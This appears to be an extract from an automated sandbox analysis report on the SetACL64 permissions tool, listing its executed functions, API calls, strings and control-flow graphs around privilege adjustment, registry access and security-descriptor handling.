NetShareSetInfo 43234->43254 43244 7ff7c1709910 33 API calls 43235->43244 43257 7ff7c1713f80 35 API calls 43236->43257 43238 7ff7c1737dcb NetShareGetInfo 43249 7ff7c1737de2 43238->43249 43250 7ff7c1737e06 43238->43250 43285 7ff7c1736970 33 API calls 4 library calls 43239->43285 43240->43239 43241 7ff7c1742180 _handle_error 8 API calls 43252 7ff7c17376f8 43241->43252 43253 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43242->43253 43243->43276 43256 7ff7c1737fff 43244->43256 43245 7ff7c17377a4 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43245->43242 43246 7ff7c1737857 43245->43246 43247 7ff7c17379cd 43245->43247 43258 7ff7c1737ff3 43245->43258 43281 7ff7c1736970 33 API calls 4 library calls 43246->43281 43247->43193 43266 7ff7c1713f80 35 API calls 43249->43266 43250->43221 43260 7ff7c1737e10 NetApiBufferFree 43250->43260 43253->43258 43254->43222 43255->43269 43264 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43256->43264 43262 7ff7c1737d52 43257->43262 43261 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 43258->43261 43259 7ff7c1737b76 43286 7ff7c1714230 31 API calls 2 library calls 43259->43286 43260->43221 43261->43235 43262->43256 43262->43269 43264->43268 43265 7ff7c17378ee Concurrency::details::platform::DefaultWaiterPool::get_waiter 43265->43218 43272 7ff7c173793e Concurrency::details::platform::DefaultWaiterPool::get_waiter 43265->43272 43266->43250 43267 7ff7c1737b80 43287 7ff7c1714230 31 API calls 2 library calls 43267->43287 43268->43216 43269->43238 43270 7ff7c1737860 Concurrency::details::platform::DefaultWaiterPool::get_waiter 43270->43209 43270->43265 43270->43268 43272->43230 43278 7ff7c173798a Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 43272->43278 43273 7ff7c1737b8a 43288 7ff7c1714230 31 API calls 2 library calls 43273->43288 43275 7ff7c1737b94 43289 7ff7c1714230 31 API calls 2 library calls 43275->43289 43276->43212 43276->43214 43283 7ff7c1739fb0 16 API calls _handle_error 43276->43283 43278->43279 43279->43241 43280->43245 43281->43270 43282->43225 43283->43214 43284->43212 43285->43259 43286->43267 43287->43273 43288->43275 43289->43279 43290->43208

                                                  Executed Functions

                                                  Function 00007FF7C172BC40 Relevance: 151.2, APIs: 76, Strings: 9, Instructions: 2433COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Information$Delete$Valid$FreeLocal$CopyLength
                                                  • String ID: > because a filter keyword matched.$> failed with: $Omitting ACL of: <$Processing ACL of: <$Reading the SD from <$SetEntriesInAcl for DACL of <$SetEntriesInAcl for SACL of <$Write2SD$Writing SD to <
                                                  • API String ID: 3366768055-1688761767
                                                  • Opcode ID: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                                  • Instruction ID: 184d0a05e9c608dc038ae5c86e2532ec0fdf160d6081a258b27a17f66ffb8907
                                                  • Opcode Fuzzy Hash: 8c702df0ce635fb3871e4a0553cb4715271af5242ae0ef260948fefd7f14e07d
                                                  • Instruction Fuzzy Hash: D733E272A1878285EB20EF26D8447EDA3A1FB497A4F804131DA5D47BDADFBCE585C310
                                                  Function 00007FF7C172A350 Relevance: 54.2, APIs: 16, Strings: 14, Instructions: 1740registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$Close$EnumLockitSimpleString::operator=std::_$ConnectCreateLockit::_Lockit::~_OpenRegistrySetgloballocalestd::locale::_
                                                  • String ID: RegKeyFixPathAndOpen$Unintentionally the following registry key was created: <$classes_root$current_user$hkcr$hkcu$hkey_classes_root$hkey_current_user$hkey_local_machine$hkey_users$hklm$hku$machine$users
                                                  • API String ID: 2754268630-3593729730
                                                  • Opcode ID: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                                  • Instruction ID: d7c45289fadb91d4506b982c6d8fb25b431a50ad90e9958d8f525fba19bf132d
                                                  • Opcode Fuzzy Hash: 706d74c401a7eba7e1d9deaebb3a5822d64d4f896357cd9c5b521f9506353fbc
                                                  • Instruction Fuzzy Hash: 22F2B122B09B42C5EF10EF66D4402BDA3A1FB88BA4F954135DA4E07B9ADFBCD545C360
                                                  Function 00007FF7C1736B2A Relevance: 39.1, APIs: 21, Strings: 1, Instructions: 609registryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastSecurity$Valid$AbsoluteCloseKernelMakeObject$CreateDescriptorFileFreeHandleInfoLocalNamed
                                                  • String ID: SeSecurityPrivilege
                                                  • API String ID: 3247214862-2333288578
                                                  • Opcode ID: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                                  • Instruction ID: c4d16990089a1e9978aaf8a4d3ef57f9d45dbf2172b3914dac22a36576166efb
                                                  • Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                                  • Instruction Fuzzy Hash: EE42A072B1874286FB14EF26D44436DA3A1FB48BA8FC04135DA4C57A9ADFBCE561C360
                                                  Function 00007FF7C1723A5E Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 464COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2473 7ff7c1723a5e-7ff7c1723a8e AdjustTokenPrivileges 2474 7ff7c1723aa9-7ff7c1723abc GetLastError CloseHandle 2473->2474 2475 7ff7c1723a90-7ff7c1723a98 GetLastError 2473->2475 2477 7ff7c1723abd-7ff7c1723ac6 2474->2477 2475->2474 2476 7ff7c1723a9a-7ff7c1723aa7 FindCloseChangeNotification 2475->2476 2476->2477 2478 7ff7c1723ac8-7ff7c1723adf 2477->2478 2479 7ff7c1723aff-7ff7c1723b1b 2477->2479 2480 7ff7c1723afa call 7ff7c17421a0 2478->2480 2481 7ff7c1723ae1-7ff7c1723af4 2478->2481 2482 7ff7c1723b1d-7ff7c1723b34 2479->2482 2483 7ff7c1723b54-7ff7c1723b56 2479->2483 2480->2479 2481->2480 2484 7ff7c17243fb-7ff7c1724400 call 7ff7c17488fc 2481->2484 2486 7ff7c1723b4f call 7ff7c17421a0 2482->2486 2487 7ff7c1723b36-7ff7c1723b49 2482->2487 2488 7ff7c1723b5c-7ff7c1723be2 call 7ff7c1713f80 * 2 call 7ff7c171d260 2483->2488 2489 7ff7c1723c5e-7ff7c1723d83 call 7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2483->2489 2490 7ff7c1724401-7ff7c1724406 call 7ff7c17488fc 2484->2490 2486->2483 2487->2486 2487->2490 2511 7ff7c1723c1c-7ff7c1723c25 2488->2511 2512 7ff7c1723be4-7ff7c1723bfb 2488->2512 2513 7ff7c1723dbc-7ff7c1723dd8 2489->2513 2514 7ff7c1723d85-7ff7c1723d9c 2489->2514 2502 7ff7c1724407-7ff7c172440c call 7ff7c17488fc 2490->2502 2515 7ff7c172440d-7ff7c1724412 call 7ff7c17488fc 2502->2515 2511->2489 2521 7ff7c1723c27-7ff7c1723c3e 2511->2521 2516 7ff7c1723bfd-7ff7c1723c10 2512->2516 2517 7ff7c1723c16-7ff7c1723c1b call 7ff7c17421a0 2512->2517 2522 7ff7c1723dda-7ff7c1723df1 2513->2522 2523 7ff7c1723e11-7ff7c1723e13 2513->2523 2518 7ff7c1723db7 call 7ff7c17421a0 2514->2518 2519 7ff7c1723d9e-7ff7c1723db1 2514->2519 2534 7ff7c1724413-7ff7c1724418 call 7ff7c17488fc 2515->2534 2516->2502 2516->2517 2517->2511 2518->2513 2519->2515 2519->2518 2527 7ff7c1723c59 call 7ff7c17421a0 2521->2527 2528 7ff7c1723c40-7ff7c1723c53 2521->2528 2529 7ff7c1723e0c call 7ff7c17421a0 2522->2529 2530 7ff7c1723df3-7ff7c1723e06 2522->2530 2531 7ff7c1723e19-7ff7c1723e9f call 7ff7c1713f80 * 2 call 7ff7c171d260 2523->2531 2532 7ff7c1723f1b-7ff7c1724040 call 7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2523->2532 2527->2489 2528->2527 2535 7ff7c17243dd-7ff7c17243fa call 7ff7c17488fc * 5 2528->2535 2529->2523 2530->2529 2530->2534 2560 7ff7c1723ed9-7ff7c1723ee2 2531->2560 2561 7ff7c1723ea1-7ff7c1723eb8 2531->2561 2562 7ff7c1724079-7ff7c1724095 2532->2562 2563 7ff7c1724042-7ff7c1724059 2532->2563 2551 7ff7c1724419-7ff7c172441e call 7ff7c17488fc 2534->2551 2535->2484 2565 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 2551->2565 2560->2532 2571 7ff7c1723ee4-7ff7c1723efb 2560->2571 2567 7ff7c1723eba-7ff7c1723ecd 2561->2567 2568 7ff7c1723ed3-7ff7c1723ed8 call 7ff7c17421a0 2561->2568 2572 7ff7c1724097-7ff7c17240ae 2562->2572 2573 7ff7c17240ce-7ff7c17240d0 2562->2573 2569 7ff7c172405b-7ff7c172406e 2563->2569 2570 7ff7c1724074 call 7ff7c17421a0 2563->2570 2589 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 2565->2589 2567->2551 2567->2568 2568->2560 2569->2565 2569->2570 2570->2562 2578 7ff7c1723efd-7ff7c1723f10 2571->2578 2579 7ff7c1723f16 call 7ff7c17421a0 2571->2579 2580 7ff7c17240c9 call 7ff7c17421a0 2572->2580 2581 7ff7c17240b0-7ff7c17240c3 2572->2581 2582 7ff7c17241d8-7ff7c1724209 2573->2582 2583 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 2573->2583 2578->2535 2578->2579 2579->2532 2580->2573 2581->2580 2581->2589 2585 7ff7c1724268-7ff7c1724294 2582->2585 2586 7ff7c172420b-7ff7c172420e 2582->2586 2634 7ff7c172415e-7ff7c1724175 2583->2634 2635 7ff7c1724196-7ff7c172419f 2583->2635 2597 7ff7c1724314-7ff7c1724320 2585->2597 2598 7ff7c1724296-7ff7c1724299 2585->2598 2595 7ff7c1724210-7ff7c1724220 2586->2595 2607 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 2589->2607 2601 7ff7c1724239-7ff7c1724266 2595->2601 2602 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 2595->2602 2603 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 2597->2603 2604 7ff7c1724335-7ff7c1724341 2597->2604 2606 7ff7c17242a0-7ff7c17242b4 2598->2606 2601->2585 2601->2595 2602->2601 2628 7ff7c1724356-7ff7c172435b 2602->2628 2619 7ff7c1724331-7ff7c1724333 2603->2619 2611 7ff7c172435d-7ff7c1724367 call 7ff7c1724810 2604->2611 2612 7ff7c1724343-7ff7c1724354 call 7ff7c173e4b0 2604->2612 2614 7ff7c17242cd-7ff7c17242d2 2606->2614 2615 7ff7c17242b6-7ff7c17242c7 call 7ff7c173e4b0 2606->2615 2636 7ff7c17243b1-7ff7c17243dc call 7ff7c1742180 2611->2636 2637 7ff7c1724369-7ff7c1724372 2611->2637 2612->2611 2612->2628 2624 7ff7c17242ea-7ff7c1724312 2614->2624 2625 7ff7c17242d4-7ff7c17242e8 call 7ff7c173e4b0 2614->2625 2615->2614 2615->2628 2619->2604 2619->2628 2624->2597 2624->2606 2625->2624 2625->2628 2628->2636 2639 7ff7c1724177-7ff7c172418a 2634->2639 2640 7ff7c1724190-7ff7c1724195 call 7ff7c17421a0 2634->2640 2635->2582 2641 7ff7c17241a1-7ff7c17241b8 2635->2641 2642 7ff7c172439e-7ff7c17243a1 2637->2642 2643 7ff7c1724374-7ff7c1724396 call 7ff7c172a350 2637->2643 2639->2607 2639->2640 2640->2635 2649 7ff7c17241ba-7ff7c17241cd 2641->2649 2650 7ff7c17241d3 call 7ff7c17421a0 2641->2650 2646 7ff7c17243af 2642->2646 2647 7ff7c17243a3-7ff7c17243aa call 7ff7c173b2b0 2642->2647 2643->2636 2656 7ff7c1724398 2643->2656 2646->2636 2647->2646 2649->2535 2649->2650 2650->2582 2656->2642
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CloseProcessToken$AdjustChangeCurrentFindHandleNotificationOpenPrivileges
                                                  • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                                  • API String ID: 596220290-1541018277
                                                  • Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                                  • Instruction ID: ac90694353ef193aec2b6cceb0f84730b87cee635175ebcca07711e85a17869f
                                                  • Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                                  • Instruction Fuzzy Hash: 3622A472B1878281EB04DF56E444369A361FB897F4F905135EA9D43AEADFBCE085C710
                                                  Function 00007FF7C173E4B0 Relevance: 21.5, APIs: 11, Strings: 1, Instructions: 483COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2657 7ff7c173e4b0-7ff7c173e4f4 2658 7ff7c173e4ff-7ff7c173e507 2657->2658 2659 7ff7c173e4f6-7ff7c173e4fb call 7ff7c174d6ac 2657->2659 2660 7ff7c173e509 2658->2660 2661 7ff7c173e50c-7ff7c173e519 ConvertStringSidToSidW 2658->2661 2659->2658 2660->2661 2663 7ff7c173e53b-7ff7c173e574 2661->2663 2664 7ff7c173e51b-7ff7c173e536 call 7ff7c173ec20 LocalFree 2661->2664 2667 7ff7c173e579-7ff7c173e583 2663->2667 2668 7ff7c173e576 2663->2668 2672 7ff7c173ebc8-7ff7c173ebee call 7ff7c1742180 2664->2672 2670 7ff7c173e589-7ff7c173e597 2667->2670 2671 7ff7c173e6fd-7ff7c173e708 call 7ff7c173f9c0 2667->2671 2668->2667 2674 7ff7c173e599 2670->2674 2675 7ff7c173e5b3 2670->2675 2681 7ff7c173e70a-7ff7c173e71c 2671->2681 2682 7ff7c173e720-7ff7c173e762 call 7ff7c1713f80 call 7ff7c1714750 2671->2682 2678 7ff7c173e5a0-7ff7c173e5a4 2674->2678 2679 7ff7c173e5b6-7ff7c173e5b9 2675->2679 2678->2679 2683 7ff7c173e5a6-7ff7c173e5b1 2678->2683 2679->2671 2684 7ff7c173e5bf-7ff7c173e5c8 2679->2684 2681->2682 2703 7ff7c173e79a-7ff7c173e7b0 2682->2703 2704 7ff7c173e764-7ff7c173e77a 2682->2704 2683->2675 2683->2678 2684->2671 2686 7ff7c173e5ce-7ff7c173e5d5 2684->2686 2687 7ff7c173e5d7-7ff7c173e5dc 2686->2687 2688 7ff7c173e5e1-7ff7c173e602 2686->2688 2690 7ff7c173eb3d-7ff7c173eb41 2687->2690 2691 7ff7c173e607-7ff7c173e618 call 7ff7c1713f80 2688->2691 2692 7ff7c173e604 2688->2692 2695 7ff7c173eb7d-7ff7c173eb92 2690->2695 2696 7ff7c173eb43-7ff7c173eb59 2690->2696 2707 7ff7c173e61a-7ff7c173e630 2691->2707 2708 7ff7c173e650-7ff7c173e67a 2691->2708 2692->2691 2701 7ff7c173ebc6 2695->2701 2702 7ff7c173eb94-7ff7c173ebaa 2695->2702 2699 7ff7c173eb5b-7ff7c173eb6e 2696->2699 2700 7ff7c173eb74-7ff7c173eb79 call 7ff7c17421a0 2696->2700 2699->2700 2709 7ff7c173ec19-7ff7c173ec1f call 7ff7c17488fc 2699->2709 2700->2695 2701->2672 2711 7ff7c173ebac-7ff7c173ebbf 2702->2711 2712 7ff7c173ebc1 call 7ff7c17421a0 2702->2712 2705 7ff7c173e7f2 2703->2705 2706 7ff7c173e7b2-7ff7c173e7eb call 7ff7c1740c18 call 7ff7c1715cf0 2703->2706 2713 7ff7c173e77c-7ff7c173e78f 2704->2713 2714 7ff7c173e795 call 7ff7c17421a0 2704->2714 2724 7ff7c173e7f6 2705->2724 2706->2724 2769 7ff7c173e7ed-7ff7c173e7f0 2706->2769 2718 7ff7c173e64b call 7ff7c17421a0 2707->2718 2719 7ff7c173e632-7ff7c173e645 2707->2719 2722 7ff7c173e680-7ff7c173e695 2708->2722 2723 7ff7c173ebf5-7ff7c173ebfa call 7ff7c1709910 2708->2723 2711->2712 2725 7ff7c173ebef-7ff7c173ebf4 call 7ff7c17488fc 2711->2725 2712->2701 2713->2714 2715 7ff7c173ebfb-7ff7c173ec00 call 7ff7c17488fc 2713->2715 2714->2703 2748 7ff7c173ec01-7ff7c173ec06 call 7ff7c17488fc 2715->2748 2718->2708 2719->2718 2729 7ff7c173ec13-7ff7c173ec18 call 7ff7c17488fc 2719->2729 2734 7ff7c173e69a-7ff7c173e6b5 call 7ff7c1713f80 2722->2734 2735 7ff7c173e697 2722->2735 2723->2715 2736 7ff7c173e7f9-7ff7c173e7fd 2724->2736 2725->2723 2729->2709 2751 7ff7c173e6b7-7ff7c173e6cd 2734->2751 2752 7ff7c173e6ed-7ff7c173e6f9 2734->2752 2735->2734 2742 7ff7c173e7ff-7ff7c173e802 2736->2742 2743 7ff7c173e823-7ff7c173e826 2736->2743 2742->2743 2750 7ff7c173e804-7ff7c173e810 2742->2750 2744 7ff7c173e82c-7ff7c173e875 call 7ff7c1709520 * 2 2743->2744 2745 7ff7c173e9c4 2743->2745 2775 7ff7c173e87a-7ff7c173e89c DsGetDcNameW 2744->2775 2776 7ff7c173e877 2744->2776 2754 7ff7c173e9c7-7ff7c173e9ea call 7ff7c173f3c0 2745->2754 2764 7ff7c173ec07-7ff7c173ec0c call 7ff7c17488fc 2748->2764 2750->2743 2765 7ff7c173e812-7ff7c173e81d 2750->2765 2757 7ff7c173e6e8 call 7ff7c17421a0 2751->2757 2758 7ff7c173e6cf-7ff7c173e6e2 2751->2758 2752->2671 2768 7ff7c173e9ef-7ff7c173e9f5 2754->2768 2757->2752 2758->2729 2758->2757 2783 7ff7c173ec0d-7ff7c173ec12 call 7ff7c17488fc 2764->2783 2765->2743 2772 7ff7c173e9fb-7ff7c173ea00 2768->2772 2773 7ff7c173eaa3-7ff7c173eaab 2768->2773 2769->2736 2779 7ff7c173ea1d-7ff7c173ea22 2772->2779 2780 7ff7c173ea02-7ff7c173ea18 call 7ff7c173f3c0 2772->2780 2777 7ff7c173eaad-7ff7c173eac3 2773->2777 2778 7ff7c173eae4-7ff7c173eaec 2773->2778 2786 7ff7c173e89e-7ff7c173e8a3 2775->2786 2787 7ff7c173e912-7ff7c173e91a 2775->2787 2776->2775 2784 7ff7c173eade-7ff7c173eae3 call 7ff7c17421a0 2777->2784 2785 7ff7c173eac5-7ff7c173ead8 2777->2785 2781 7ff7c173eaee-7ff7c173eb04 2778->2781 2782 7ff7c173eb24-7ff7c173eb39 2778->2782 2779->2773 2789 7ff7c173ea24-7ff7c173ea6a call 7ff7c1713f80 call 7ff7c173f3c0 2779->2789 2780->2773 2791 7ff7c173eb1f call 7ff7c17421a0 2781->2791 2792 7ff7c173eb06-7ff7c173eb19 2781->2792 2782->2690 2783->2729 2784->2778 2785->2783 2785->2784 2797 7ff7c173e8a6-7ff7c173e8ae 2786->2797 2794 7ff7c173e91c-7ff7c173e92e 2787->2794 2795 7ff7c173e951-7ff7c173e964 2787->2795 2789->2773 2821 7ff7c173ea6c-7ff7c173ea82 2789->2821 2791->2782 2792->2729 2792->2791 2802 7ff7c173e94c call 7ff7c17421a0 2794->2802 2803 7ff7c173e930-7ff7c173e943 2794->2803 2804 7ff7c173e982-7ff7c173e98a 2795->2804 2805 7ff7c173e966-7ff7c173e981 call 7ff7c1713f80 2795->2805 2797->2797 2807 7ff7c173e8b0-7ff7c173e909 call 7ff7c1713f80 call 7ff7c170fe30 call 7ff7c171eaf0 2797->2807 2802->2795 2803->2748 2810 7ff7c173e949 2803->2810 2804->2754 2808 7ff7c173e98c-7ff7c173e9a2 2804->2808 2805->2804 2807->2787 2830 7ff7c173e90b-7ff7c173e911 NetApiBufferFree 2807->2830 2815 7ff7c173e9bd-7ff7c173e9c2 call 7ff7c17421a0 2808->2815 2816 7ff7c173e9a4-7ff7c173e9b7 2808->2816 2810->2802 2815->2754 2816->2783 2816->2815 2824 7ff7c173ea9d-7ff7c173eaa2 call 7ff7c17421a0 2821->2824 2825 7ff7c173ea84-7ff7c173ea97 2821->2825 2824->2773 2825->2764 2825->2824 2830->2787
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2140094996.00007FF7C1701000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C1700000, based on PE: true
                                                  • Associated: 00000004.00000002.2140081597.00007FF7C1700000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140154839.00007FF7C178E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1792000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000004.00000002.2140171439.00007FF7C1797000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_7ff7c1700000_SetACL64.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
                                                  • String ID: computername
                                                  • API String ID: 1703289946-1800712684
                                                  • Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                                  • Instruction ID: 8326e1b8e59295722186241ef7f704be1e1d5316c92c87dbfd19babd664f2942
                                                  • Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                                  • Instruction Fuzzy Hash: E522C062B14B5285FB00AF6AD8443AD6371BB487A8FC05635DF5D17ADADFB8E481C320
                                                  Function 00007FF7C1723D1B Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 345COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2831 7ff7c1723d1b-7ff7c1723d4b AdjustTokenPrivileges 2832 7ff7c1723d4d-7ff7c1723d55 GetLastError 2831->2832 2833 7ff7c1723d66-7ff7c1723d79 GetLastError CloseHandle 2831->2833 2832->2833 2834 7ff7c1723d57-7ff7c1723d64 CloseHandle 2832->2834 2835 7ff7c1723d7a-7ff7c1723d83 2833->2835 2834->2835 2836 7ff7c1723dbc-7ff7c1723dd8 2835->2836 2837 7ff7c1723d85-7ff7c1723d9c 2835->2837 2840 7ff7c1723dda-7ff7c1723df1 2836->2840 2841 7ff7c1723e11-7ff7c1723e13 2836->2841 2838 7ff7c1723db7 call 7ff7c17421a0 2837->2838 2839 7ff7c1723d9e-7ff7c1723db1 2837->2839 2838->2836 2839->2838 2842 7ff7c172440d-7ff7c1724412 call 7ff7c17488fc 2839->2842 2844 7ff7c1723e0c call 7ff7c17421a0 2840->2844 2845 7ff7c1723df3-7ff7c1723e06 2840->2845 2846 7ff7c1723e19-7ff7c1723e9f call 7ff7c1713f80 * 2 call 7ff7c171d260 2841->2846 2847 7ff7c1723f1b-7ff7c1724040 call 7ff7c1713f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2841->2847 2849 7ff7c1724413-7ff7c1724418 call 7ff7c17488fc 2842->2849 2844->2841 2845->2844 2845->2849 2869 7ff7c1723ed9-7ff7c1723ee2 2846->2869 2870 7ff7c1723ea1-7ff7c1723eb8 2846->2870 2871 7ff7c1724079-7ff7c1724095 2847->2871 2872 7ff7c1724042-7ff7c1724059 2847->2872 2862 7ff7c1724419-7ff7c172441e call 7ff7c17488fc 2849->2862 2873 7ff7c172441f-7ff7c1724424 call 7ff7c17488fc 2862->2873 2869->2847 2878 7ff7c1723ee4-7ff7c1723efb 2869->2878 2874 7ff7c1723eba-7ff7c1723ecd 2870->2874 2875 7ff7c1723ed3-7ff7c1723ed8 call 7ff7c17421a0 2870->2875 2879 7ff7c1724097-7ff7c17240ae 2871->2879 2880 7ff7c17240ce-7ff7c17240d0 2871->2880 2876 7ff7c172405b-7ff7c172406e 2872->2876 2877 7ff7c1724074 call 7ff7c17421a0 2872->2877 2895 7ff7c1724425-7ff7c172442a call 7ff7c17488fc 2873->2895 2874->2862 2874->2875 2875->2869 2876->2873 2876->2877 2877->2871 2884 7ff7c1723efd-7ff7c1723f10 2878->2884 2885 7ff7c1723f16 call 7ff7c17421a0 2878->2885 2886 7ff7c17240c9 call 7ff7c17421a0 2879->2886 2887 7ff7c17240b0-7ff7c17240c3 2879->2887 2888 7ff7c17241d8-7ff7c1724209 2880->2888 2889 7ff7c17240d6-7ff7c172415c call 7ff7c1713f80 * 2 call 7ff7c171d260 2880->2889 2884->2885 2894 7ff7c17243dd-7ff7c172440c call 7ff7c17488fc * 8 2884->2894 2885->2847 2886->2880 2887->2886 2887->2895 2891 7ff7c1724268-7ff7c1724294 2888->2891 2892 7ff7c172420b-7ff7c172420e 2888->2892 2940 7ff7c172415e-7ff7c1724175 2889->2940 2941 7ff7c1724196-7ff7c172419f 2889->2941 2903 7ff7c1724314-7ff7c1724320 2891->2903 2904 7ff7c1724296-7ff7c1724299 2891->2904 2901 7ff7c1724210-7ff7c1724220 2892->2901 2894->2842 2913 7ff7c172442b-7ff7c1724430 call 7ff7c17488fc 2895->2913 2907 7ff7c1724239-7ff7c1724266 2901->2907 2908 7ff7c1724222-7ff7c1724233 call 7ff7c173e4b0 2901->2908 2909 7ff7c1724322-7ff7c172432c call 7ff7c173e4b0 2903->2909 2910 7ff7c1724335-7ff7c1724341 2903->2910 2912 